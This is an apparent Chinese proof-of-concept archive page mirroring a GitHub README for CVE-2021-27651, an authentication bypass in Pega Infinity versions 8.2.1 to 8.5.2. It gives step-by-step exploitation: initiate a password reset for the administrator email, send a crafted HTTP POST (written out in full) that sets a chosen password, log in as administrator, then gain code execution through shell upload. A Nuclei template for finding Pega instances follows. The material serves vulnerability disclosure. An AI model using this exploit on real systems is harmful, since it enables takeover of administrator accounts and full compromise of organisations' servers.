支持本站 — 捐款将帮助我们持续运营

目标: 1000 元,已筹: 1000

100.0%
立即捐款

POC详情: ba421e5136d6d12a90fbc62afe6652475b9af9dc

来源
https://github.com/orangmuda/CVE-2021-27651
关联漏洞
标题:PEGA pega infinity 授权问题漏洞 (CVE-2021-27651)
Description:PEGA pega infinity是美国PEGA公司的一个应用软件。提供从数字混乱过渡到真正的数字转换。 Pega Infinity 8.2.1版本至8.5.2版本存在授权问题漏洞,该漏洞源于本地帐户的密码重置功能可以用来绕过本地认证检查。
Description
bypass all stages of the password reset flow
介绍
## Summary
An attacker can bypass all stages of the password reset flow and reset any user's account on Pega infinity. This is done by (1) initiating the password reset flow and typing in the victim email, then (2) forcing the HTTP POST request to update the password through. An attacker could login using the newly edited account and fully compromise the Pega instance via the many acceptable post-auth code execution vectors (modifying dynamic pages, templating, etc.)

## Steps to Reproduce
1. Browse to the login page of any Pega instance
2. Click "reset password"
3. Type in "administrator@pega.com", proxy the HTTP request, send the HTTP request with the "administrator@pega.com" to the Burp repeater tab or any similar tab, then allow the request to go through by disabling the proxy or clicking "send"
4. After allowing the initial request to go through, modify the HTTP requests body in the repeater so it includes the following data...

```
POST /prweb/PRServlet/app/default/:PEGA_ID*/!STANDARD HTTP/1.1 (:PEGA_ID is a unique ID for each site, it is in this format: ZOgwf2Zk3OsEg_oG74MXXxG2bXKbv56W)
Host: redacted.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 112
Origin: https://redacted.com
DNT: 1
Connection: close
Referer: https://redacted.com/prweb/PRServlet/app/default/:PEGA_ID*/!STANDARD
Cookie: yourCookie
Upgrade-Insecure-Requests: 1

pzAuth=guest&NewPassword=Rules%401234&ConfPassword=Rules%401234&pyActivity%3DCode-Security.pzChangeUserPassword=
```

5. Login using the following credentials after sending the HTTP request, having bypassed the confirmation part of reset password and being able to login to the administrator account...

```
administrator@pega.com / Rules@1234
```

6. From there, you can achieve RCE via any of the many accepted use administrator-only code execution vectors

## Affected Versions
Pega Infinity >= 8.2.1
Pega Infinity <= 8.5.2

## Impact
Full compromise of any Pega instance with no prerequisite knowledge.

## Supporting Media
![Password bypass](https://i.imgur.com/kxLRhys.png)
* Password bypass

![Remote code execution via shell upload](https://i.imgur.com/zC8kOfG.png)
* Remote code execution via shell upload

## Nuclei Template
```
id: pega

info:
  name: Pega Infinity Login
  author: sshell
  severity: low

requests:
  - method: GET
    path:
      - "{{BaseURL}}/prweb/PRRestService/unauthenticatedAPI/v1/docs"
    headers:
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
    matchers:
      - type: word
        words:
          - "Pega API"
```

## Credit
Andri Wijayanti (@andridev_),
文件快照

 [4.0K]  /data/pocs/ba421e5136d6d12a90fbc62afe6652475b9af9dc
└── [2.8K]  README.md

0 directories, 1 file
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮件到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对 POC 代码进行快照,为了长期维护,请考虑为本地 POC 付费/捐赠,感谢您的支持。